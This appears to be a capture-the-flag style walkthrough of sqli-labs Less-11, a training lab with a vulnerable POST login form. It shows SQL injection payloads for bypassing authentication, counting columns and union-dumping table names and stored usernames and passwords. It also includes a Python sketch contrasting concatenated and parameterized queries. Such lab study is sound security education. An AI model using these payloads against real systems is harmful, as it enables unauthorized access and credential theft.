#sqli-labs less 11

Finally at the POST stage.

First, try a common weak password.

username:admin password:admin

And it just worked...

Never mind, let's go through it the "proper" way.

It is also a chance to practice with Burp.

Enter admin and 111 in the login form.

Next, try

admin'

111

This returns:

> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '111' LIMIT 0,1' at line 1

which shows the injection is the single-quote string type.

Try admin'or 1=1--+

admin'or '1'='1' --+
Found that admin'or '1'='1--+ bypasses the login without trouble.
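The quote test and the login bypass above, shown beside the parameterized fix. This is an added example, not the lab's own code: it uses SQLite in place of MySQL, a constructed `users` table, and a query shape assumed from the `LIMIT 0,1` in the error message. The function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed in-memory table standing in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "Dumb", "Dumb"), (2, "admin", "admin")])
    return db

def login_concat(db, uname, passwd):
    # Vulnerable form: input is pasted inside the quotes of the SQL text,
    # so a quote in the input ends the string and the rest is parsed as SQL.
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{uname}' and password='{passwd}' LIMIT 0,1")
    try:
        return db.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return f"SQL error: {exc}"

def login_bound(db, uname, passwd):
    # Hardened form: placeholders keep input as data, never as SQL syntax.
    sql = ("SELECT username, password FROM users "
           "WHERE username=? and password=? LIMIT 0,1")
    return db.execute(sql, (uname, passwd)).fetchone()

if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the walkthrough; "--+" arrives as "-- " after form decoding.
    cases = [("admin", "admin"),
             ("admin'", "111"),
             ("admin'or '1'='1' -- ", "111")]
    for uname, passwd in cases:
        print(repr(uname),
              "| concat:", login_concat(db, uname, passwd),
              "| bound:", login_bound(db, uname, passwd))
```

With bound parameters the two quoted inputs match no row, and only the genuine admin/admin pair logs in.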

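Next, try admin' order by n--+

By changing n, the error only shows up once it reaches order by 3.

Then I used admin' union select 1,2--+ to find the display positions, but it never succeeded.

Then I tried passwd=11' union select 1,2--+, and the output was echoed successfully.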

This... I need to look into this.

Anyway, from here on the attack goes through the passwd injection point.

11' union select user(),version() --+

OK, now use the usual payloads:

union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security')--+

union select 1,(select group_concat(column_name)from information_schema.columns where table_name='users')--+

union select 1,(select group_concat(username,';',password) from security.users)--+

(select group_concat(username,';',password) from security.users)--+
